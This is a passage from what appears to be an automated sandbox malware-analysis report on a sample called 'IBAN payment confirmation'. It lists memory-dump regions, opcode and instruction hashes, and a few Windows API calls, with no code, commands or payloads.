                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DispatchMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2061451462-0
                                                                                                                              • Opcode ID: 9be6da4a77114ea1bdb7b35dd40cb2d2cced79c1814ebcf21eedbde5908bf318
                                                                                                                              • Instruction ID: 3fdb3ff6984b1426e3f4b8e5f0e97a4aece410ec330a23f0994d8604f9ae1a9d
                                                                                                                              • Opcode Fuzzy Hash: 9be6da4a77114ea1bdb7b35dd40cb2d2cced79c1814ebcf21eedbde5908bf318
                                                                                                                              • Instruction Fuzzy Hash: 3C112EB5D047498FCB20DF9AE944B9EFBF4EB48324F10846AE518A3210C378A580CFA5
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 3A20D395
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: 452e5ad86ec6baca27e0435cf890239f1ac233777d1b2d97ae91d9b7043017ba
                                                                                                                              • Instruction ID: 8e4be71d4af040dcaef30320587c26edafd790b78206145d151bba57f4225101
                                                                                                                              • Opcode Fuzzy Hash: 452e5ad86ec6baca27e0435cf890239f1ac233777d1b2d97ae91d9b7043017ba
                                                                                                                              • Instruction Fuzzy Hash: 031145B5C003498FCB20DF9AC544BCEFBF4EB48324F108419D518A7210C738A540CFA1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Timer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2870079774-0
                                                                                                                              • Opcode ID: 8cba4a054073064834927364ff68e987163830fa0de2d35fc328de9aaf6364d1
                                                                                                                              • Instruction ID: e9a7bbf0af469f2513aaf2e68079336cc10c88a561880d33a426fca7bd987399
                                                                                                                              • Opcode Fuzzy Hash: 8cba4a054073064834927364ff68e987163830fa0de2d35fc328de9aaf6364d1
                                                                                                                              • Instruction Fuzzy Hash: 6011E5B68003499FDB20DF9AD985BDEFBF8FB48320F108419D559A7210C379A944CFA1
                                                                                                                              APIs
                                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3A20D87F), ref: 3A20E6AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DispatchMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2061451462-0
                                                                                                                              • Opcode ID: 345852f1aade196ff7620f60df41292e78389fe4d40efbf604e229dd5762e286
                                                                                                                              • Instruction ID: cc27236aabcdeadf96c1ef0255aade17b0ffbb7f0b40db097d9cb0dea7b4e6ca
                                                                                                                              • Opcode Fuzzy Hash: 345852f1aade196ff7620f60df41292e78389fe4d40efbf604e229dd5762e286
                                                                                                                              • Instruction Fuzzy Hash: 1811FEB5C006498FCB20DF9AD544B9EBBF4EB48324F10846AD419A3210D378A584CFA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 40feab8bbec7e7d8e91a12020d08930f5090405c178acd33b3913734e7940038
                                                                                                                              • Instruction ID: 9e2318a2cf85e5a55ce38ef159aa6ec714b016dea97b65fda052a462e172bb0b
                                                                                                                              • Opcode Fuzzy Hash: 40feab8bbec7e7d8e91a12020d08930f5090405c178acd33b3913734e7940038
                                                                                                                              • Instruction Fuzzy Hash: C5E1A574940218CFEB25DF60C955BADBBB2FB89301F5085AA980A77394CB355E82DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 491d016bfa667e1028890bd918528ced1531164fdfe143afab1d213890559813
                                                                                                                              • Instruction ID: c6ebe3cea2a263ea16300f50e81f7e0e128a3783ab8e05b3d1c9fe4d43966214
                                                                                                                              • Opcode Fuzzy Hash: 491d016bfa667e1028890bd918528ced1531164fdfe143afab1d213890559813
                                                                                                                              • Instruction Fuzzy Hash: 7BE1A474A40218CFEB25DF60C955BADBBB2FB89301F5085AA980A77394CB355E82DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: acc7c9085f13b9ddbd4d3c5daacb9488603fdf980313af6ec97ba306386808ea
                                                                                                                              • Instruction ID: 2278aa2f3d8aa1cd0c9889b8a30cc2e6f593346cd05d364933af3355c8eac7e2
                                                                                                                              • Opcode Fuzzy Hash: acc7c9085f13b9ddbd4d3c5daacb9488603fdf980313af6ec97ba306386808ea
                                                                                                                              • Instruction Fuzzy Hash: 4C916774B00B058FDB04EF79E8909AABBF2BF882047108629D446DB755EB74ED46CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cc8f4344d1de0bf9be107ac7af07b67b606f0e196f8780f3dfa7bbbf676efc98
                                                                                                                              • Instruction ID: 840079ed876c6d5f59c1f8cd9604f6da3f5ef096a102dad5cc43531669d854b2
                                                                                                                              • Opcode Fuzzy Hash: cc8f4344d1de0bf9be107ac7af07b67b606f0e196f8780f3dfa7bbbf676efc98
                                                                                                                              • Instruction Fuzzy Hash: 05710575A04358DFEB15DFA5D858AADBBB2BF88301F108129E406AB354DB349982CF41
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6cd81033d238accbdd64bc701de58f685e6181d83f9b51384217ae50f2592466
                                                                                                                              • Instruction ID: 10c69e0ff219cb9d4003f576edf3d5ab010b9007bdd7ad0737860c32a476847a
                                                                                                                              • Opcode Fuzzy Hash: 6cd81033d238accbdd64bc701de58f685e6181d83f9b51384217ae50f2592466
                                                                                                                              • Instruction Fuzzy Hash: 8861D774A40258DFEB25DF60C855BADBB72FF88301F1084AA990A77394CB356D82EF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5c6b1c287607ad42275db3c27f503f9f00fce55b7b67c7d9f62f158b3ac2ec9b
                                                                                                                              • Instruction ID: 382bcae4b196f1826c59a1221fb50a14c2c498948c524d293f29e930b1da26e2
                                                                                                                              • Opcode Fuzzy Hash: 5c6b1c287607ad42275db3c27f503f9f00fce55b7b67c7d9f62f158b3ac2ec9b
                                                                                                                              • Instruction Fuzzy Hash: 7551E074D01318DFEB14DFA5D854BADBBB2BF88301F608129D809AB355DB356A4ADF80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c6fb5a4d19248276bb2360f5f637736d9b473949118afb01b72719eb09ca3404
                                                                                                                              • Instruction ID: 015d2a05872effda3dfd8b9e82c5fda9c3a4db36c4499630524559cbcf348dda
                                                                                                                              • Opcode Fuzzy Hash: c6fb5a4d19248276bb2360f5f637736d9b473949118afb01b72719eb09ca3404
                                                                                                                              • Instruction Fuzzy Hash: DF619274E00218DFDB54DFA9C890ADDBBB2FF89301F248169D819AB365DB31A946CF40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e23a6e211f500f922c2082b67e10348dab044d8f30beb37c834eb53678d9722
                                                                                                                              • Instruction ID: 202381d493a94b822f0b8a19526176847b1a4a82a4e902740785efaab8662784
                                                                                                                              • Opcode Fuzzy Hash: 8e23a6e211f500f922c2082b67e10348dab044d8f30beb37c834eb53678d9722
                                                                                                                              • Instruction Fuzzy Hash: EC412370A193848FEB11DFA5D45069E7FF5BF46350F4542AEC441EB251CB30AC46CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3d2737eee8f3245b03516286e6a2af555be1c5f63677fb88c67236d616363db5
                                                                                                                              • Instruction ID: 558fc5cda83a0638b2da9060df5bb9fa809e9803cd9a93a026a98d2eb2da42b6
                                                                                                                              • Opcode Fuzzy Hash: 3d2737eee8f3245b03516286e6a2af555be1c5f63677fb88c67236d616363db5
                                                                                                                              • Instruction Fuzzy Hash: 43311E7295E3C5EFCB038BB08C518847FB5AF1B61534A81E7E084CB473D2298899DB22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b82707565168edc399644cf1287dec5877dfcaa798969d5116822b4b8f31a81
                                                                                                                              • Instruction ID: 2cf436e0e7f6678688ed1822d2540f54a4ef49a475315da2049d410f1e6d27c5
                                                                                                                              • Opcode Fuzzy Hash: 7b82707565168edc399644cf1287dec5877dfcaa798969d5116822b4b8f31a81
                                                                                                                              • Instruction Fuzzy Hash: 45317A39D44609CFCB02CFA4C4466ADBBF1BB89305F04806ED412E7290D739D98ACF80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9cf7f9857bdd022b3f04f6c17577b838cd5fdb72959f406001700f8cdaffa2b
                                                                                                                              • Instruction ID: 2655f1e69eb8a5668225ff857ed4d044c0d409399f42bbe2b56b3ff861c33f6a
                                                                                                                              • Opcode Fuzzy Hash: b9cf7f9857bdd022b3f04f6c17577b838cd5fdb72959f406001700f8cdaffa2b
                                                                                                                              • Instruction Fuzzy Hash: 793190B4A117058BFB28DB65E4507EEBBF15F89740F54842DD846E7640DF34E806CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6a8ba0e307cfc9c02f98826a972375158b2eb6dfe2093712859ee6e07ef06d17
                                                                                                                              • Instruction ID: 80aab84f7b8cc06d61994d64ed63e24ad84b4adf49b5b8faa2fba3cf9c9206c5
                                                                                                                              • Opcode Fuzzy Hash: 6a8ba0e307cfc9c02f98826a972375158b2eb6dfe2093712859ee6e07ef06d17
                                                                                                                              • Instruction Fuzzy Hash: D3315878A103588BEB19DFB5D454AAE7BB2BF88301F148539D406EB354DF389942CF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd894a3e73c4f1067abeb161c1071b0cb38e6dd0637e7986482a6a1d26ee6a2a
                                                                                                                              • Instruction ID: 93a4d562bab7972fdb9644ece2efa27b2e95ee57550a8b77ef1c6074765a6a87
                                                                                                                              • Opcode Fuzzy Hash: bd894a3e73c4f1067abeb161c1071b0cb38e6dd0637e7986482a6a1d26ee6a2a
                                                                                                                              • Instruction Fuzzy Hash: EE310674E147418FE729CFA9D4506EEBBF25F89380F14852DD442E7690DB30AC06CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5e288450dc418f515f5953d550aaabfdc0b52c57fdfdb3042503d42925513c10
                                                                                                                              • Instruction ID: 7e0952f524bb48fc056274c78cb83d85d2d325199c89580b838fb94146f02a30
                                                                                                                              • Opcode Fuzzy Hash: 5e288450dc418f515f5953d550aaabfdc0b52c57fdfdb3042503d42925513c10
                                                                                                                              • Instruction Fuzzy Hash: 55313474D01318DFDB04DFA5D4547DEBBB2AF89301F50842AE805AB285DB755A8ACF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502473776.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_9d000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b7449c7f6743ed9654d16e73072bc09eb238d4f7824dd0abc25d73f13511f74
                                                                                                                              • Instruction ID: f45481dc7ff389bee99979b6441024a72cedcf9e596f1f37c590e48a7b9c1f99
                                                                                                                              • Opcode Fuzzy Hash: 1b7449c7f6743ed9654d16e73072bc09eb238d4f7824dd0abc25d73f13511f74
                                                                                                                              • Instruction Fuzzy Hash: BB213A71584200DFDF14DF10D9C0B26BFA5FB94320F24C56AD9090F246C336E856EBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20d1133bf958db347ce6a231ed641581be517365b5730f0a3584f07ced15126
                                                                                                                              • Instruction ID: e80ce9b2f77173096e1ebdf693ed1970e1e29cf1fda8991424b0be4e24e9f529
                                                                                                                              • Opcode Fuzzy Hash: b20d1133bf958db347ce6a231ed641581be517365b5730f0a3584f07ced15126
                                                                                                                              • Instruction Fuzzy Hash: A921BF74D147158BEB10DFA5E491AEEBBF6BF48340F94422AD411BB240CB70AD86CBE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502620404.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_ad000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b78ab75c58b071abac720f144fd3a988bf96260c912e5f09de97d6bfd151f21
                                                                                                                              • Instruction ID: c6192e3b5f85b68d4a38ee8b00ef8200392bbfbf279780531d42c06c0e2f1e5a
                                                                                                                              • Opcode Fuzzy Hash: 1b78ab75c58b071abac720f144fd3a988bf96260c912e5f09de97d6bfd151f21
                                                                                                                              • Instruction Fuzzy Hash: 8E212271604200EFDB24DF94D9C0F26BBA1EB85314F24C56ED84A0FA42C336D847CA62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502473776.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_9d000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                                                              • Instruction ID: 75c30dec444e905b2dacf2aeb21225cd19b82776d93782fce5b3b3ca2f2a72f9
                                                                                                                              • Opcode Fuzzy Hash: 193d0a6e4c6a41fa8d380d8a3aebfad6d5fdfd2e37f37faa7afe8a0cd07d9e29
                                                                                                                              • Instruction Fuzzy Hash: DC110376544240CFCF05CF10D5C4B16BFB1FB94320F24C5AAD8480B616C336E856DBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 964074836fed684094de567cf72ba8df2ee12494c25b21548e3b44c83dd680df
                                                                                                                              • Instruction ID: d5401aa10019f7080ecf341feb7d1959c46415ee0ee80f4105f52cb9a183ab75
                                                                                                                              • Opcode Fuzzy Hash: 964074836fed684094de567cf72ba8df2ee12494c25b21548e3b44c83dd680df
                                                                                                                              • Instruction Fuzzy Hash: 6421F278D10209DFDB00DFA4C4456EEBBB2FB48301F10956AD911B3394DB789A4ACF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2502620404.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_ad000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                                                              • Instruction ID: e55928b3f63c07f136b2e370c25e33d22a16d8fcfd49e1b03e0c3bd6dac7d8e0
                                                                                                                              • Opcode Fuzzy Hash: 7f3e037e22fa59686557c36097c7f2c442b72f34ba89836c3c3f47136ec8bdf6
                                                                                                                              • Instruction Fuzzy Hash: 0111BB75504280DFCB15CF54D5C0B15BBA2FB85324F28C6AAD84A4BA56C33AD84ACB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 413b38b5d81ae69435510983a954ce3bffb77ac07f5fc440ca488003813152c9
                                                                                                                              • Instruction ID: 8533da3eee82bf08334bed3f3ab2543fd28266deffea9aef9c0182aabbe89fbe
                                                                                                                              • Opcode Fuzzy Hash: 413b38b5d81ae69435510983a954ce3bffb77ac07f5fc440ca488003813152c9
                                                                                                                              • Instruction Fuzzy Hash: 3F11E531D183449FDB028F78D8512EA7FB1EF86310F0441AAE485DB191DB74698ACBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6faf2f584a8e2eaf0f4885acf2a2ee6a50af9b8112a9d746917691282c0bcebc
                                                                                                                              • Instruction ID: 9d41f9debf154d894dd3c62142348a299bed6c12d434f6dd7861f18e7e685351
                                                                                                                              • Opcode Fuzzy Hash: 6faf2f584a8e2eaf0f4885acf2a2ee6a50af9b8112a9d746917691282c0bcebc
                                                                                                                              • Instruction Fuzzy Hash: 4D116D70740A018FD324DF7DD44196ABBF2BF9A25431582AAE049CB776DB30ED86DB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b556634b4301cad9e996c38e6f7c7a0f22b55a1884ffa2bd071bfb72c61714d
                                                                                                                              • Instruction ID: 367139085310013db3550838e85581a08d2decb48841a0c1a634be0fe270e9f0
                                                                                                                              • Opcode Fuzzy Hash: 5b556634b4301cad9e996c38e6f7c7a0f22b55a1884ffa2bd071bfb72c61714d
                                                                                                                              • Instruction Fuzzy Hash: 6C018031700A018FD324DF6ED44195AB7E6EF9A354305856AE00ACB336EB30FC46DB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 02eb3e401a7945d3f43a6f117b11b1aed5bc81a163001da6e23e8b1169b8ac2e
                                                                                                                              • Instruction ID: 80e70ab8c86456c5ac42d960f5fed25320bfc039cc4deda47bd36bf9a87d7dda
                                                                                                                              • Opcode Fuzzy Hash: 02eb3e401a7945d3f43a6f117b11b1aed5bc81a163001da6e23e8b1169b8ac2e
                                                                                                                              • Instruction Fuzzy Hash: F9015634D12604CFDB04DFA8E8546EEB7B1FB8A302F50A47AC500B3260DB359842CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 81a3729fd74bc70286a23675f2676f7d8838e52626bdbb9e5624de8fe4cb4030
                                                                                                                              • Instruction ID: 6951f2c88fff05309ba8a83a90fbe4ab9be3cfa5c7b1d990ad3b53dda9273091
                                                                                                                              • Opcode Fuzzy Hash: 81a3729fd74bc70286a23675f2676f7d8838e52626bdbb9e5624de8fe4cb4030
                                                                                                                              • Instruction Fuzzy Hash: 3CF08734D12608CFEB04DFA9E8546EDB7B2FF8A301F50A429C504B3260DB355842CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d142d7cf415d624d6427f37b1b3bd34db5ed77f84ced3121fe150e1f867a4022
                                                                                                                              • Instruction ID: eeaffd0df9de1924861063006e2f31d8c3b4ddcc879590c3b39e61f4b50dd464
                                                                                                                              • Opcode Fuzzy Hash: d142d7cf415d624d6427f37b1b3bd34db5ed77f84ced3121fe150e1f867a4022
                                                                                                                              • Instruction Fuzzy Hash: 7FF0F432E182089BDB109FA4E8517EF7BE5FB85360F00856AF405A7640CB70A549CBD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c43410eecb2356a8c3bfc9fcdcb98f7041bca21858a7cfd6cdad0d55492f4342
                                                                                                                              • Instruction ID: 077c41852516feaf1fd42ac1f4842ecf61ae6977b8e660a9494e09b3e21d810e
                                                                                                                              • Opcode Fuzzy Hash: c43410eecb2356a8c3bfc9fcdcb98f7041bca21858a7cfd6cdad0d55492f4342
                                                                                                                              • Instruction Fuzzy Hash: 1EF0A0207583451BF62522BA6415BAF65EEAFCA392F114436F505DB244DF50AC0743E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
